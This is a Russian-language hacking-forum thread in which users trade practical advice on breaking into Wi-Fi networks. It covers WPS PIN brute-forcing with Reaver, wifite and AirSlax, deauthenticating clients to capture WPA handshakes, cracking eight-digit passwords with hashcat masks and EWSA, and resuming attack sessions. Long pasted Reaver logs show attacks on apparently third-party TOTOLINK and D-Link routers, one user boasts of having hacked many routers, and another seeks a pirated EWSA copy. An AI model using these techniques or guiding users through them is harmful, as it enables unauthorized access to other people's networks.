http://img165.imagevenue.com/img.php?image=63852_.06.11_12.38.09_122_90lo.jpg http://img165.imagevenue.com/img.php?image=63852_.06.11_12.38.09_122_90lo.jpg
здесь она вторая
http://img13.imagevenue.com/img.php...pshot_00.23_2017.06.11_12.56.04_122_243l o.jpg (http://img13.imagevenue.com/img.php?image=64533_Screencast_10.06.2017_13_26_43 .webm_snapshot_00.23_2017.06.11_12.56.04_122_243lo .jpg)
binarymaster
11.06.2017, 12:55
↑ (https://antichat.live/posts/4095392/)
На интересующей точке она первая, нет клиентов. Хотя пакеты куда то шлёт со страшной силой.
Компьютер, подключённый к точке по проводу, может посылать broadcast и multicast пакеты в сеть, а точка доступа по всем канонам отправляет их в беспроводной эфир, чтобы другие устройства могли их получить.
JonBraun
11.06.2017, 13:27
↑ (https://antichat.live/posts/4095394/)
Компьютер, подключённый к точке по проводу, может посылать broadcast и multicast пакеты в сеть, а точка доступа по всем канонам отправляет их в беспроводной эфир, чтобы другие устройства могли их получить.
Как тогда с ней связаться, на рисунке она вторая. Включён WPS.
но подбирается как то не так по одному сообщению в 20 сек, или я не правильно понимаю.
wifite
http://img168.imagevenue.com/loc948/th_66094_Screencast_122_948lo.jpg (http://img168.imagevenue.com/img.php?image=66094_Screencast_122_948lo.jpg)
binarymaster
11.06.2017, 13:33
↑ (https://antichat.live/posts/4095405/)
но подбирается как то не так по одному сообщению в 20 сек, или я не правильно понимаю.
Failed to associate - значит вообще не подбирается.
Точка не принимает вас - либо фильтрация по MAC, либо плохой сигнал.
JonBraun
11.06.2017, 13:52
Получу альфу, помощьнее сигнал будет. Тогда попробую ещё.
На домашнем роутере не получается тренироваться, даже при включённом WPS, wifite его не видит. К тому же WPS включается после нажатия кнопки и сам отключается секунд через 30.
Спасибо.
JonBraun
12.06.2017, 19:18
Как сделать, чтобы искать WPS за несколько заходов. Например часа по 3 и в следующий заход продолжать с предыдущего места?
↑ (https://antichat.live/posts/4095747/)
Как сделать, чтобы искать WPS за несколько заходов. Например часа по 3 и в следующий заход продолжать с предыдущего места?
Ривер сохраняет свои сессии, об этом неоднократно писалось на форуме.
Для того, что бы продолжить с последнего пина, редактируется файл AA:BB:CCD:EE:FF.wpc (запоминаете первую строку в документе) в папке ривера.
Или после остановки перебора этот файл сохраняете и при новом запуске тупо копируете с заменой в папку ривера
(это в том случае, если работаете с носителя или виртуалки).
/threads/424494/page-56#post-3937036 (https://antichat.live/threads/424494/page-56/)
/threads/424494/page-56#post-3937053 (https://antichat.live/threads/424494/page-56/)
JonBraun
16.06.2017, 20:09
Получил рукопожатие, хотя клиентов и не было видно. Запустил Elicomsoft c восьмизначным цифровым паролём, при скорости 2700 он написал, надо 14 суток. Посдсчитал, при такой скорости должен был за час уложится. Короче, подобрал онлайн за несколько минут.
Вопрос, Elicomsoft так тупит с подсчётом времени или действительно надо 14 дней на восьмизначный цифровой пароль?
↑ (https://antichat.live/posts/4096946/)
Получил рукопожатие, хотя клиентов и не было видно. Запустил Elicomsoft c восьмизначным цифровым паролём, при скорости 2700 он написал, надо 14 суток. Посдсчитал, при такой скорости должен был за час уложится. Короче, подобрал онлайн за несколько минут.
Вопрос, Elicomsoft так тупит с подсчётом времени или действительно надо 14 дней на восьмизначный цифровой пароль?
Перебор был по словарю или маске?
Хотя за час при скорости 2700 пассов в секунду по любому не справится.Часов за 11, но не за 14 дней.
Мутации паролей в настройках отключены?
JonBraun
16.06.2017, 21:55
Пербор по словарю. Скорость написал меньше было 27 000 средня. Восьмизначный цифровой 99999999 комбинаций.
99999999/27000=3703 sec. Около часа.
Да надо было отключить мутацию. С отключенной мутацией время 1час 6 минут.
Как рукопожатий наловил, если клиентов ни одна программа не показала?
Попробуйте по маске
?d?d?d?d?d?d?d?d
Будет около часа.
Или отключить мутации в настройках атак по словарю.
JonBraun
16.06.2017, 22:04
Я понял отключил мутацию. выдал 1 час. 6 минут.
Пароль нашёл. Попробую в следующий раз. только видеокарта до 70 град нагрелась, как бы не перегреть.
binarymaster
16.06.2017, 22:30
↑ (https://antichat.live/posts/4096975/)
Как рукопожатий наловил, если клиентов ни одна программа не показала?
Клиенты были в любом случае, их мак адреса можно посмотреть в хендшейке и пакетах.
JonBraun
16.06.2017, 22:47
Не так выразился. Клиентов видно не было. Пробовал и в кали и вифи слакс, разные скрипты. Ни кто не видел подключенных клиентов. А рукопожатия поймал от троих одновременно.
binarymaster
16.06.2017, 22:52
↑ (https://antichat.live/posts/4096990/)
А рукопожатия поймал от троих одновременно.
Не исключено, что это были не авторизованные клиенты - просто какое-то устройство попыталось авторизоваться на точках, так что пароль может быть неверным.
JonBraun
16.06.2017, 23:06
Проверю ещё. Сначала разорвал им связь , потом сразу поймал 3 рукопожатия от разных клиентов.У всех троих получился одинаковый пароль.
JonBraun
19.06.2017, 11:09
не прокатило
rerererere
11.07.2017, 20:41
"Можно ли свою вафлю соединить по кабелю от провайдера с другой ?"как я понял из этой статьи https://habrahabr.ru/post/243997/ можно .НО КАК куда что прописывать я так и не понял. Есть кто в этой теме шарит?
rerererere
11.07.2017, 20:46
↑ (https://antichat.live/posts/4104889/)
"Можно ли свою вафлю соединить по кабелю от провайдера с другой ?"как я понял из этой статьи
https://habrahabr.ru/post/243997/
можно .НО КАК куда что прописывать я так и не понял. Есть кто в этой теме шарит?
я уже взломал по кабелю "много" роутеров. Теперь надо соеденить
binarymaster
12.07.2017, 00:54
↑ (https://antichat.live/posts/4104891/)
я уже взломал по кабелю "много" роутеров. Теперь надо соеденить
Прямо все вместе, и все сразу? Слишком много.
А так, если роутер-донор поддерживает VPN PPTP или L2TP сервер, то можно его поднять, а на своём настроить аналогично клиента.
rerererere
17.07.2017, 00:22
↑ (https://antichat.live/posts/4104958/)
Прямо все вместе, и все сразу? Слишком много.
А так, если роутер-донор поддерживает VPN PPTP или L2TP сервер, то можно его поднять, а на своём настроить аналогично клиента.
↑ (https://antichat.live/posts/4104958/)
то можно его поднять, а на своём настроить аналогично клиента.
как поднять? и как настроить клиента? поподробней плиз
вот ссылка на симулятор моего роутера http://www.tp-linkru.com/resources/simulator/TL-WR740N(RU)5.0_Emulator/Index.htm
binarymaster
17.07.2017, 22:22
↑ (https://antichat.live/posts/4106700/)
поподробней плиз
Читайте руководство по эксплуатации каждого роутера, чтобы разобраться.
fioletoviy
28.10.2017, 13:01
Отличная статья.
hitrec322
07.11.2017, 17:20
согласен, спасибо за статью))
D1ld0Man
05.12.2017, 14:09
здравствуйте.
статье уже 7 лет и хочу уточнить,
вот эта команда "(eapol || wlan.fc.type_subtype == 0x08) && not malformed", она еще актуальна ?
словил 48 хендшейков с публичного ви фи, открываю и нигде этот фильтр не работает.
работает вот эта часть - (eapol || wlan.fc.type_subtype == 0x08), начинаю набирать "&& not malformed" и всё.
ну решил, что хэндшэйци так себе, хотя от меня до точки доступа и людей было всего 30 метров чистого пространства, без единой стенки,
антенка моя на 12дБ, качество сигнала было отличное.
пришел домой, словил свой собственный хэндшейк, проверил, тоже самое, фильтр не срабатывает.
что не так делаю ?
в хэшкэт же нельзя кидать не почищенный файл ?
↑ (https://antichat.live/posts/4157047/)
работает вот эта часть - (eapol || wlan.fc.type_subtype == 0x08),
Можно так: wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x04 || eapol
↑ (https://antichat.live/posts/4157047/)
в хэшкэт же нельзя кидать не почищенный файл ?
Его нужно конвертировать в hccap или hccapx.При конвертации,уберётся всё лишнее.
Самый надёжный способ,вручную вырезать ХШ.
binarymaster
05.12.2017, 16:17
↑ (https://antichat.live/posts/4157047/)
начинаю набирать "&& not malformed" и всё.
Значит у вашего драйвера адаптера не совсем корректно реализована поддержка режима монитора, 802.11 пакеты приходят не совсем корректные.
Либо менять адаптер/драйвер, либо отключить эту проверку в фильтрах.
Отличная статья, помогло )
↑ (https://antichat.live/posts/4157091/)
Либо менять адаптер/драйвер, либо отключить эту проверку в фильтрах.
Дело немножко не в этом. Новый wieshark такого фильтра не знает.
http://i97.fastpic.ru/big/2017/1206/9a/4fe86419444948df9964d1e95710ab9a.png
↑ (https://antichat.live/posts/4157047/)
нигде этот фильтр не работает.
Он не критичен, отсеивает битые пакеты. Теперь редкий софт пишет в cap полностью испорченные пакеты, они фильтруются на уровне драйвера. Побитый пакет в wireshark'e будет выделен красным, с пометкой в Info [Malformed packet].
Статья конечно классная спасибо автору, но неплохо если бы о рассказал о программе делающей тоже самое но под Windows к сожалению программа уникальная качественной документации к ней нет help написан плохо. Программа эта называется AirMagnet.
Добрый день друзья, все ссылки на EWSA битые, может кто поделится версией бесценной?)))Всех с наступающим
↑ (https://antichat.live/posts/4167558/)
Добрый день друзья, все ссылки на EWSA битые, может кто поделится версией бесценной?)))Всех с наступающим
Говори что надо?
↑ (https://antichat.live/posts/4167560/)
Говори что надо?
нужна копия ewsa)))
Всем снова здарова, есть одна проблема с WPS:
Была одна открытая точка, я этим воспользовался и добыл код ВПС, потом поставили пароль, я соответственно попробовал узнать новый пароль через подключение по ВПС (пользуюсь AirSlax Pro 5)
Мне пишет постоянно что процесс на 90,96 процентов закончен и бесконечно подставляет один и тот же пароль, потом пишет 91 процент и тот же пароль, в общем дело идет по 0,04-0,05 процента и пароль не выдает, а потом на 10 попытке заблокировался ВПС, роутер Тотолинк.
Понятное дело может ВПС поменяли, ладно, но на другой точке та же история с ВПС, хотя я специально зашел на вэб интерфейс и проверил, пароль ВПС тот же, который я ввожу в AirSlax, роутер D-Link.
На 3 других точках все прекрасно срабатывает с первого раза, роутеры TP-Link.
Итак, как с этим бороться, если AirSlax не виноват?
↑ (https://antichat.live/posts/4178363/)
как с этим бороться, если AirSlax не виноват?
Использовать любую другую нормальную сборку или программу, вместо этого поделия.
↑ (https://antichat.live/posts/4178365/)
Использовать любую другую нормальную сборку или программу, вместо этого поделия.
Почему же поделие нормально с ТП-Линком работает с первого раза?
Вы имеете ввиду что загрузив обычный Линукс и введя все вручную пароль покажет с первого раза?
binarymaster
28.01.2018, 17:53
↑ (https://antichat.live/posts/4178363/)
Мне пишет постоянно что процесс на 90,96 процентов закончен и бесконечно подставляет один и тот же пароль
Во-первых нужны логи.
↑ (https://antichat.live/posts/4178378/)
Почему же поделие нормально с ТП-Линком работает с первого раза?
Во-вторых некоторые роутеры глючат.
↑ (https://antichat.live/posts/4178404/)
Во-первых нужны логи.
Не знаю какие логи вам нужны и как их достать, идет просто ассоциация с точкой потом траинг пин, пробует 4-6 раз один и тот же пин, потом пишет что перебор 4-6 секунд на 1 пин, 90,96 % и так далее но потом 91 %, 91,05 и так далее.
↑ (https://antichat.live/posts/4178404/)
Во-вторых некоторые роутеры глючат.
Загрузка в Линукс а не в AirSlax и введение команд ручками решит эту проблему?
binarymaster
28.01.2018, 20:04
↑ (https://antichat.live/posts/4178408/)
Не знаю какие логи вам нужны и как их достать, идет просто ассоциация с точкой потом траинг пин, пробует 4-6 раз один и тот же пин, потом пишет что перебор 4-6 секунд на 1 пин, 90,96 % и так далее но потом 91 %, 91,05 и так далее.
Мне проще прочитать вывод терминала на английском, чем понять то, что вы написали в одну строчку на русском...
↑ (https://antichat.live/posts/4178408/)
Загрузка в Линукс а не в AirSlax и введение команд ручками решит эту проблему?
Без понятия, но на вашем месте я бы попробовал Router Scan, там тоже можно по WPS пароль получать.
↑ (https://antichat.live/posts/4178459/)
Мне проще прочитать вывод терминала на английском, чем понять то, что вы написали в одну строчку на русском...
Если так что то понятнее то пожалуйста ))
erwerr2321
08.02.2018, 21:42
↑ (https://antichat.live/posts/4182058/)
Если так что то понятнее то пожалуйста ))
View attachment 4615 (https://antichat.live/attachments/4615/)
Это ужасно...
Ключ -vvv можно было указать?
Или это вообще какая-то однокнопочная ломалка, и + ( - ) Вы не знаете как ей пользоваться?
↑ (https://antichat.live/posts/4182073/)
Это ужасно...
Ключ -vvv можно было указать?
Кому какой ключ?))
Это AirSlax Pro 5, там перед подбором WPS три пункта, Bully, Reaver, Ввести код вручную, я ввожу вручную и нажимаю Ривер, он этот код мучает но пароль от сети не показывает.
binarymaster
08.02.2018, 21:55
↑ (https://antichat.live/posts/4182076/)
Это AirSlax Pro 5, там перед подбором WPS три пункта, Bully, Reaver, Ввести код вручную, я ввожу вручную и нажимаю Ривер, он этот код мучает но пароль от сети не показывает.
Это не даст никакой информации...
↑ (https://antichat.live/posts/4182073/)
Или это вообще какая-то однокнопочная ломалка
Так и есть. Полагаю, нормального лога с деталями мы не дождёмся...
↑ (https://antichat.live/posts/4182077/)
Так и есть. Полагаю, нормального лога с деталями мы не дождёмся...
Ну извините, то что нормальный образ линукса это исправит, никто мне не гарантировал - я и не пытался.
erwerr2321
08.02.2018, 22:13
↑ (https://antichat.live/posts/4182076/)
Кому какой ключ?))
Вот я и говорю..., это ужасно!
↑ (https://antichat.live/posts/4182079/)
я и не пытался.
Ну так а кто Вам виноват?
↑ (https://antichat.live/posts/4182081/)
Вот я и говорю..., это ужасно!
Ну вы бы сразу сказали что в глаза не видели его никогда этот AirSlax Pro 5.
Команду:
Для получения более подробной информации используйте -vv:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
Я в курсе где вводить, хотя в АирСлаксе есть терминал, там и попробую вручную.
erwerr2321
08.02.2018, 22:32
↑ (https://antichat.live/posts/4182083/)
Ну вы бы сразу сказали что в глаза не видели его никогда этот AirSlax Pro 5.
.
Прости, а какой там именно ЭирШлак 5.1 или 5.3?
Ты б если сам хелп открыл - прозрел!
И на самом деле я искренне рад, что не пристрастился к этим Вашим говно сборкам!
↑ (https://antichat.live/posts/4182083/)
Я в курсе где вводить, хотя в АирСлаксе есть терминал, там и попробую вручную.
Теперь мы в этом сильно сомневаемся, "Брат"!
↑ (https://antichat.live/posts/4182085/)
Вашим говно сборкам
Они не мои, и хорошие сборки, не надо вводить по 10 команд вручную, нажал пару кнопок и перехватил хэндшейк, начинал я тоже со сборок линукса, вводил все в ручную, и путь до флэшки чтобы потом cap файл скопировать.
В AirSlax Pro все легче и быстрее, поэтому на ней и остановился.
Хотя как видно работает не совсем корректно насчет WPS.
erwerr2321
08.02.2018, 23:20
↑ (https://antichat.live/posts/4182099/)
Они не мои, и хорошие сборки, не надо вводить по 10 команд вручную, нажал пару кнопок и перехватил хэндшейк, начинал я тоже со сборок линукса, вводил все в ручную, и путь до флэшки чтобы потом cap файл скопировать.
В AirSlax Pro все легче и быстрее, поэтому на ней и остановился.
Хотя как видно работает не совсем корректно насчет WPS.
Во, ты заметил, как ты противоречишь сам себе в этом своём посте?
↑ (https://antichat.live/posts/4182099/)
и хорошие сборки, не надо вводить по 10 команд вручную, нажал пару кнопок и перехватил хэндшейк,
Вот потому вам и написали про эти говносборки. Если они такие хорошие и вы за них заплатили - так и морочьте голову тому, кто за них деньги получил.
А если оно свежепижженое - так какие претензии? Всегда можно сказать, что это не корявое поделие, а защита от воровства.
Зачем вы притянули эту дохлую ворону на форум?
Да ну платить еще ))
Они же работают не корректно.
Вот в общем, чтобы не нападали на меня, это в терминале в АирСлаксе:
.SpoilerTarget" type="button">Spoiler
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from 78:44:76:96:2C:EC
[+] Switching mon0 to channel 1
[+] Associated with 78:44:76:96:2C:EC (ESSID: TOTOLINK_N150RT)
[+] Trying pin 99956042
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 99956042
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 99956042
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 99956042
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Switching mon0 to channel 9
[+] Switching mon0 to channel 10
[+] Switching mon0 to channel 11
[+] Switching mon0 to channel 12
[+] Switching mon0 to channel 13
[+] Switching mon0 to channel 14
Очевидно что эта точка потом пропала из зоны видимости, да и обмен биконами с ней очень тугой хотя связь на -68.
Вот вторая, но там я сам все прекратил:
.SpoilerTarget" type="button">Spoiler
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from 2C:AB:255:ED:41
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Switching mon0 to channel 9
[+] Switching mon0 to channel 10
[+] Switching mon0 to channel 11
[+] Switching mon0 to channel 12
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[+] Associated with 2C:AB:255:ED:41 (ESSID: DIR-300)
[+] Trying pin 47768970
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 47768970
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 47768970
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 47768970
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 47768970
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 47768970
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 90.91% complete @ 2018-02-08 21:43:56 (0 seconds/pin)
[+] Trying pin 47768970
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 47768970
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 47768970
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 47768970
[!] WARNING: Failed to associate with 2C:AB:255:ED:41 (ESSID: DIR-300)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
binarymaster
09.02.2018, 00:29
↑ (https://antichat.live/posts/4182109/)
Очевидно что эта точка потом пропала из зоны видимости, да и обмен биконами с ней очень тугой хотя связь на -68.
Похоже что адаптер/драйвер визуально завышают показатели сигнала. Судя по логам, сигнал совсем никакой.
Для TOTOLINK можно попробовать RS, как я и советовал раньше, он лучше бьёт точки с плохим сигналом (обрабатывает все пакеты даже с нарушением последовательности).
порекомендуйте куда рыть.
адаптер альфа из китая на чипе Ralink, сборка BT5 для ловли хэдов, антенна двойной биквадрат, живу в часдоме живу в жопе мира, антенна вытягивает 2 вифи сигнал около 75-80дби (в винде 2 палки) как грамотно полймать шейк, использую команду
root@bt:~# besside-ng mon0
